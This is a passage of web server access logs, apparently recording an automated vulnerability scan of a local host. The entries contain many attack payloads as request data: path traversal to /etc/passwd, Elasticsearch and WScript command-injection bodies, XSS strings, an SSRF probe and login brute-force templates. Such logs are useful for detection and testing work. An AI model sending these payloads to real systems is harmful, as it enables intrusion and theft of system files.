+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mstore-api/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"405","body_bytes_sents":"584","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /header.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('29KD1uuBgHm2i0pi6r9pH8tJWIo')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /footer.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=skatubazar_option HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 